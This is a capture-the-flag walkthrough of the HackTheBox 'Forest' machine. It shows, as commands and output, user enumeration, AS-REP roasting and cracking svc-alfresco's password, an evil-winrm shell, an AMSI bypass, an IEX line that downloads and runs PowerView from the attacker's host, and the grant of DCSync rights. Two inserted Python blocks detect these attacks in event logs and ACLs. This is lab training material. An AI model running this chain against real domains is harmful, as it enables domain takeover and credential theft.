HackTheBox-Forest
ssooking Lv5

HackTheBox - Forest (key points: Kerberos pre-authentication / WinRM on 5985 / domain penetration)

https://blog.csdn.net/weixin_45527786/article/details/105558478

Scanning

# nmap -T4 -sS -sV -sC 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 02:15 EST
Nmap scan report for 10.10.10.161
Host is up (0.28s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-04 07:23:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/4%Time=5E5F559D%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h48m17s, deviation: 4h37m10s, median: 8m15s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-03-03T23:26:20-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-04T07:26:18
|_ start_date: 2020-03-04T05:20:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.81 seconds

Ports 139 and 445 are open, so an SMB service is running. We therefore use enum4linux to try to enumerate the host's users.

$ enum4linux -S -U 10.10.10.161
...
...
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
...
...
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

The domain name is HTB. Next we filter the host's user names out into a wordlist.

$ enum4linux -U 10.10.10.161 | tee enum4linux.txt
$ cat enum4linux.txt | grep "user:" | awk '{split($0,a,"[" ); print a[2]}' | awk '{split($0,b,"]" ); print b[1]}' > userlist.txt


cat users.txt | awk -F ":" '{print $5}' | awk -F " " '{print $1}' > userlist.txt

Incorrect:
# https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html
$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt
$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

Use GetNPUsers.py to find the users in the list that do not require Kerberos pre-authentication; this turns up the user svc-alfresco and yields its hash. Without the -format parameter the hash is produced in hashcat format by default.

$ python GetNPUsers.py HTB/ -usersfile /root/userlist.txt -format john -dc-ip 10.10.10.161
...
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$svc-alfresco@HTB:32d83ad3aeac3898ec4fe24764a37f79$33a0e1816aa4bef47b40636df342ebd304358a005bb31deac95f8416e8ff635bdfe2a0a0c1917fe0940665cd1c0086f314b5bbe72e5a4d27d6490d08ba5681b26259877978107facdb7d55a499883bc0e814be1efdc244d34bb26d01e2c6079c104ecc4ddbb3f821fc995881cc520523bcf3a1f4e6f265058a336f93d3790a640b54ccf29ab6e4bb407c8941e245821795b2d4ff3a07d7f57e4ae440fed0878e5740f234d6f0917fab497c54c7cf0673b8909d1c9610d4696a446ae08041471a36fe94366ffa6e2d2bb9bf27b71ecd96622eafaf79ef93788cd175ce0c2458e0
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ak47 doesn't have UF_DONT_REQUIRE_PREAUTH set
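As an added defender-side example (not code from the original write-up): the userAccountControl bit that GetNPUsers.py tests for, a parser for the $krb5asrep$ lines in both the john and the hashcat form, and the Security-log 4768 pattern that shows the same request on the domain controller. The account and event records below are constructed samples.

```python
import re

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit; impacket calls it UF_DONT_REQUIRE_PREAUTH
RC4_HMAC = 0x17              # etype 23, the cipher behind the crackable $krb5asrep$ line above

# Constructed LDAP-style dump of a few accounts (flag values are made up for the example).
ACCOUNTS = [
    {"sAMAccountName": "sebastien",    "userAccountControl": 0x10200},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},
    {"sAMAccountName": "lucinda",      "userAccountControl": 0x10200},
]

def accounts_without_preauth(accounts):
    """Names whose userAccountControl has DONT_REQ_PREAUTH set: the same bit
    GetNPUsers.py reports on for every name in its user list."""
    return [a["sAMAccountName"] for a in accounts
            if a["userAccountControl"] & DONT_REQ_PREAUTH]

def parse_krb5asrep(line):
    """Pull (account, realm) out of an AS-REP hash line, accepting both the john
    form ($krb5asrep$user@REALM:...) and the hashcat form ($krb5asrep$23$user@REALM:...).
    Returns None for anything else, so a triage script can skip unrelated lines."""
    m = re.match(r"^\$krb5asrep\$(?:23\$)?([^@$]+)@([^:]+):[0-9a-f]{32}\$[0-9a-f]+$", line)
    return (m.group(1), m.group(2)) if m else None

# Constructed Security-log 4768 (Kerberos TGT requested) events, reduced to the fields
# that matter: pre_auth_type 0 means the KDC answered without any pre-authentication.
EVENTS = [
    {"id": 4768, "account": "sebastien",    "pre_auth_type": 2, "etype": 0x12, "client": "10.10.14.3"},
    {"id": 4768, "account": "svc-alfresco", "pre_auth_type": 0, "etype": 0x17, "client": "10.10.14.3"},
    {"id": 4769, "account": "svc-alfresco", "pre_auth_type": 0, "etype": 0x17, "client": "10.10.14.3"},
]

def asrep_roast_candidates(events):
    """4768 events with no pre-authentication and an RC4 ticket: that pairing is
    what yields an offline-crackable AS-REP, and is rare for clients that use AES."""
    return [e for e in events
            if e["id"] == 4768 and e["pre_auth_type"] == 0 and e["etype"] == RC4_HMAC]
```

The fix on the directory side is clearing the "Do not require Kerberos preauthentication" flag on any account the first function returns; the 4768 filter is what to alert on until that is done.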

Save the hash as hash.txt

$krb5asrep$svc-alfresco@HTB:32d83ad3aeac3898ec4fe24764a37f79$33a0e1816aa4bef47b40636df342ebd304358a005bb31deac95f8416e8ff635bdfe2a0a0c1917fe0940665cd1c0086f314b5bbe72e5a4d27d6490d08ba5681b26259877978107facdb7d55a499883bc0e814be1efdc244d34bb26d01e2c6079c104ecc4ddbb3f821fc995881cc520523bcf3a1f4e6f265058a336f93d3790a640b54ccf29ab6e4bb407c8941e245821795b2d4ff3a07d7f57e4ae440fed0878e5740f234d6f0917fab497c54c7cf0673b8909d1c9610d4696a446ae08041471a36fe94366ffa6e2d2bb9bf27b71ecd96622eafaf79ef93788cd175ce0c2458e0

Crack it with john, loading the rockyou.txt wordlist.

root@localhost:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$svc-alfresco@HTB)
1g 0:00:00:11 DONE (2020-03-04 04:17) 0.08650g/s 353435p/s 353435c/s 353435C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@localhost:~# john --show hash.txt
$krb5asrep$svc-alfresco@HTB:s3rvice

1 password hash cracked, 0 left

Cracking with hashcat:

https://forum.hackthebox.eu/discussion/2749/getnpusers-py-explained-video

https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html

Then use CrackMapExec to execute commands.

evil-winrm

https://vulners.com/kitploit/KITPLOIT:1521717899068290187

sudo gem install winrm winrm-fs colorize stringio
sudo gem install evil-winrm

git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Connect to the host with evil-winrm

$ evil-winrm -i 192.168.1.100 -u <Username> -p <Password> -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p "s3rvice"
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e47ae7022664cda6eb013fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

List the groups in the domain

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group /domain

Group Accounts for \\

-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
The command completed with one or more errors.

The group listing shows Exchange groups, so we try to escalate through the high default privileges Exchange holds.

Reference: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

Or simply search for CVE-2018-8581.

Starting privilege escalation
The svc-alfresco user can be used directly to carry out the series of permission-granting operations.
However, to get a better feel for how the permissions of these different groups are divided and to become more familiar with the domain environment, I made myself a new helper user and walked through the whole process with it. First I add a user pkp with the password pkp666!, then add it to the domain's Exchange group. Bypass is used to get around the restriction on uploading PowerView. Only with PowerView's help can I grant myself DCSync rights.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user pkp pkp666! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" pkp /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" pkp /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

,. ( . ) " ,. ( . ) .
(" ( ) )' ,' (` '` (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Laox @Hackplayers

[+] Bypass-4MSI
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
[+] Patched! :D

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 'pkp666!' -asplain -force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = new-object system.management.automation.pscredential('htb\pkp', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity pkp -Credential $cred -Rights DCSync
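Added example, not part of the write-up: the defender's view of the Exchange Windows Permissions -> WriteDacl -> DCSync chain above, auditing the domain object's DACL for unexpected replication rights and matching the 4662 events a DCSync leaves behind. The ACEs and events are constructed samples; the two replication GUIDs are the real Active Directory schema GUIDs.

```python
import re

# Extended-right GUIDs that together grant DCSync (real Active Directory schema GUIDs).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Principals expected to hold replication rights on the domain head; anyone else is a finding.
EXPECTED_HOLDERS = {"Domain Controllers", "Enterprise Domain Controllers",
                    "Enterprise Read-only Domain Controllers", "Administrators"}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")

def short_name(principal):
    """'HTB\\pkp' -> 'pkp' (machine accounts keep their trailing '$')."""
    return principal.split("\\")[-1]

# Constructed DACL dump of the domain object DC=htb,DC=local after the session above.
DOMAIN_ACES = [
    {"principal": "HTB\\Domain Controllers",          "right": "ExtendedRight", "object_type": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\Exchange Windows Permissions", "right": "WriteDacl",     "object_type": None},
    {"principal": "HTB\\pkp",                          "right": "ExtendedRight", "object_type": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "HTB\\pkp",                          "right": "ExtendedRight", "object_type": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
]

def unexpected_replication_holders(aces):
    """Principals outside EXPECTED_HOLDERS that hold a replication right on the domain head."""
    return sorted({a["principal"] for a in aces if a["object_type"] in REPL_RIGHTS
                   and short_name(a["principal"]) not in EXPECTED_HOLDERS})

def writedacl_holders(aces):
    """Principals able to rewrite the domain DACL, i.e. to grant DCSync to anyone later."""
    return sorted({a["principal"] for a in aces if a["right"] == "WriteDacl"})

# Constructed Security-log 4662 events; 'properties' mirrors the event's Properties field
# (the control-access GUIDs the caller exercised; the last one uses a placeholder GUID).
REPL_PROPS = "Control Access\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
EVENTS_4662 = [
    {"subject": "HTB\\FOREST$", "object_type": "domainDNS", "properties": REPL_PROPS},
    {"subject": "HTB\\pkp",     "object_type": "domainDNS", "properties": REPL_PROPS},
    {"subject": "HTB\\pkp",     "object_type": "user", "properties": "Write Property\n{00000000-0000-0000-0000-000000000000}"},
]

def dcsync_events(events):
    """Non-machine subjects that exercised a replication GUID (a real DC replicates as FOREST$)."""
    hits = []
    for e in events:
        if set(GUID_RE.findall(e["properties"].lower())).intersection(REPL_RIGHTS) \
                and not short_name(e["subject"]).endswith("$"):
            hits.append(e["subject"])
    return hits
```

The WriteDacl finding is the root cause to fix (the dirkjanm post referenced above describes removing that Exchange permission); the replication-holder and 4662 checks catch the abuse after the fact.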

https://yaboygmoney.github.io/htb/forest.html

https://mp.weixin.qq.com/s/VrRCxszh03ffAq531XNyKg

https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html

  • Post title:HackTheBox-Forest
  • Post author:ssooking
  • Create time:2020-07-17 11:31:00
  • Post link:https://ssooking.github.io/2020/07/hackthebox-forest/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.